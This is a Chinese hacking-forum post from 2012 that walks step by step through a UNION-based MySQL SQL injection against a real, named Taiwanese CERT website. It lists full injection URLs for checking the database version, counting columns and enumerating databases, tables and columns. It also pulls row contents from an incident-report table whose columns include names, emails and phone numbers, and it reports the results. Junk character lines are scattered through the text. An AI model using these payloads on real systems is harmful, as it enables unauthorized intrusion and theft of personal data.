中国网络渗透测试联盟
标题:
.高级暴库方法讲解
[打印本页]
作者:
admin
时间:
2012-9-13 17:57
标题:
.高级暴库方法讲解
1.判断版本
http://www.cert.org.tw/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
+ G# y0 C) r& {! a3 j* R0 Y% a
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
+ n" L) y* b |! V& Z& Y
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--
' l2 e' \& V6 _9 R2 t X
3.查看数据库版本及当前用户,
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
4 L' X) U) D; w" Q- j' |/ A
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
' t% Q( G) p& B0 J. f9 U
4.判断有没有写权限
+ V. p' ?7 \+ ]" v( j( W$ d
http://www.cert.org.tw/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
; ^, Y+ I9 J! w! J3 P
没办法,手动猜表啦
9 Z" p0 F# |0 y5 V' |3 i; C
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
- a1 O: `1 n2 V' y+ c
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
3 Z; c; E4 S7 I( w% f$ w/ Y+ ]8 L+ [
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
) k: e- H8 ], g3 M _* M
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
0 u/ H9 B5 |- O8 Q8 s c
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
7 g) x5 a+ B/ Z" ^, i
6.爆表,爆的是twcert库
9 s- ~: z( K1 f6 @- w. u* q
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
3 l& Z: d: H, s
爆出如下表
/ C5 ?' P, {- |3 C
downloadfile,irsys,newsdata,secrpt,secrpt_big5
) t/ q4 E$ `5 m8 a" T( V
7.爆列名,这次爆的是irsys表
+ B; x: @3 @- y% s
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
* z% b; H, l0 i* O8 V$ y" h* y7 Z0 x
爆出如下列
+ z) I/ Z/ C% j8 e( T
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
: |2 `2 P8 U$ L
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
. o8 l, w9 v2 h @
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
9 D: K. R- D7 _& n" ]4 m
返回是3,说明每个列里有3个地段
9 j' v6 }9 z0 P- d5 ^9 }3 v
9.爆字段内容
0 e$ Z* x- M- E, H) D5 J% A# _" W
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
, L7 p9 k/ d! ^
爆出name列的第一个字段的内容
; o. {+ n, [/ i1 D' M
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
( U4 m; v4 N" y9 y6 m, R
爆出name列的第二个字段的内容
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2